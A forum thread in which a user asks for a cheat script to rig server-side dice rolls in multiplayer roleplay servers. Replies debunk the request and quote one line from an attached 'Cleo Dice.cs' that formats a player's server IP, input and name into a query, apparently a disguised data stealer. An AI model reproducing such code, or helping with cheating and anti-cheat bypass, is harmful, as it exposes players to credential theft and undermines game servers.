Cleo about server side

Status
Not open for further replies.

RyanCollier

Reaction score
[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]* Name of the mod (if the mod doesn't exist, you don't have to tell one): Dice.cs in AR-RP[/font][/font]

[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]* Where you saw it (not the server, we mean if you saw any videos/screenshots about it or not): Facebook, Rgho.st,...[/font][/font]

[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]* What do you want (the most important part, explain this carefully) : A cleo that can change the /dice result.[/font][/font]
[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]Let's me describe it:[/font][/font]
[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]In a Roleplay server you have a dice and with that you can play with cmd: /dice ( Almost every RP server has this cmd )[/font][/font]
And The Result is random in 1-6 i think it belong to server side but I saw a guy in AR RP use this hack and he is a billionare.

[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]* Details (add more details to your request): [/font][/font]
[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]I Just need a cleo can change the result, i saw a video about it and a link to download that cleo but i can't download it ? I Think The Rgho.st has banned me for something, now i can't login that site can someone login, download it and upload it on Mediafire.com or remake another version for me plz :)[/font][/font]

Link: [deleted]

[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]* On/off key (specify it): automatic is okay but if you can make it toggable[/font][/font]
:iknowwhatyoudidthere:
[font='Source Sans Pro', Tahoma, 'Helvetica Neue', Arial, sans-serif][font=Monaco, Consolas, Courier, monospace]THKSS[/font][/font]

SafwanM

Reaction score
P.S Gonna virustotal first

uhm,detection ratio is 1/54 on the last analyse..

https://virustotal.com/en/file/bdbca49cc0072cf9992153684a3b6f10cb46d24063b47e6ecc2936d22a857130/analysis/

Attachments

• Cleo Dice.cs
    18.8 KB · Views: 64
Reaction score
SafwanM said:

https://virustotal.com/en/file/bdbca49cc0072cf9992153684a3b6f10cb46d24063b47e6ecc2936d22a857130/analysis/

Code:
0AD3: 20@ = format "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%02d&time=%02d:%d&data=%02d.%02d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@  
bruh  :LOL:
P.S. Don't even try to download any of this sort of "hacks", you can't change the things that happening not on your PC (like calculating dice result)

RyanCollier

Reaction score
supahdupahnubah said:
SafwanM said:

Code:
0AD3: 20@ = format "%sbase=%d&ip=%s:%d&serv=%s&inid=%d&inp=%s&mn=%d&score=%02d&time=%02d:%d&data=%02d.%02d&nn=%s" 0@ 28@ 14@ 15@ 9@ 3@ 5@ 21@ 27@ 7@ 8@ 6@ 4@ 12@  
bruh  :LOL:
P.S. Don't even try to download any of this sort of "hacks", you can't change the things that happening not on your PC (like calculating dice result)

I know it's belong to server side but, i think professional can do this, even I saw a guy can disable anti cheat of a famous server in Vietnam - Rgame.vn

RyanCollier

Reaction score
SafwanM said:
wtf so this is virus? knwe it lelelel

Who know ? Who care ? It's a cleo just a f*cking cleo ! Maybe i will tell the Professional to help me :(

Reaction score
RyanCollier said:
SafwanM said:

Who know ? Who care ? It's a cleo just a f*cking cleo ! Maybe i will tell the Professional to help me :(

Nobody will help you with THAT problem for free, unless they want it, but honestly, I don't think servers will calculate dice result on client side..

RyanCollier

Reaction score
supahdupahnubah said:
RyanCollier said:
SafwanM said:

Nobody will help you with THAT problem for free, unless they want it, but honestly, I don't think servers will calculate dice result on client side..

So it's possible ?

RyanCollier

Reaction score
Shakira said:

Everything is possible... Unless this :D
However, The scripter still can make a cleo can disable anti cheat

Kig said:

The real question you should ask here wasn't "Really ?" It's possible but you might have to find the server SQL and make a cleo by the server's database

Reaction score
RyanCollier said:
So it's possible ?
I+double+dare+you+_4d1f2818cfe15c44fd07142c373d0a08.jpg

No IT'S NOT, unless you wanna hack the server's RCON and do your filthy things there
Turns out you're asking for a server RCON brute etc etc etc, there's no cleo such this in public, even more, I think this cleo doesn't even exists
Btw cheats can't disable anticheats, they can only bypass it, wtf you're doing at this forum if you can't understand simple things?

Shakira

Reaction score
Anti cheat can not disable only can bypass for all cleo

RyanCollier

Reaction score
supahdupahnubah said:
RyanCollier said:
So it's possible ?
I+double+dare+you+_4d1f2818cfe15c44fd07142c373d0a08.jpg

No IT'S NOT, unless you wanna hack the server's RCON and do your filthy things there
Turns out you're asking for a server RCON brute etc etc etc, there's no cleo such this in public, even more, I think this cleo doesn't even exists
Btw cheats can't disable anticheats, they can only bypass it, wtf you're doing at this forum if you can't understand simple things?
Sorry, wrong word, that's why learning english is important :)
I mean, bypass the cleo, not disable the anti cheat

Shakira said:
Anti cheat can not disable only can bypass for all cleo

How can I bypass a cleo ? Can you help me :(
I'm a noob scripter

4changesLeft

Reaction score
For those who don't know:

Client-sided = Things you can change from your side of the client so you gain advantages.
Server-sided = Things you can't change because you don't have permissions by the server.

So, unless you have those permissions you can't do shit (and this can't happen with a cleo script)

0x32789

Expert
Reaction score
TehArgis said:
For those who don't know:

Client-sided = Things you can change from your side of the client so you gain advantages.
Server-sided = Things you can't change because you don't have permissions by the server.

So, unless you have those permissions you can't do shit (and this  can't happen with a cleo script)
Do you really think that those people can understand tf is client side and server side while they don't even know how does a server or script work  :LOL: :LOL:

Status
Not open for further replies.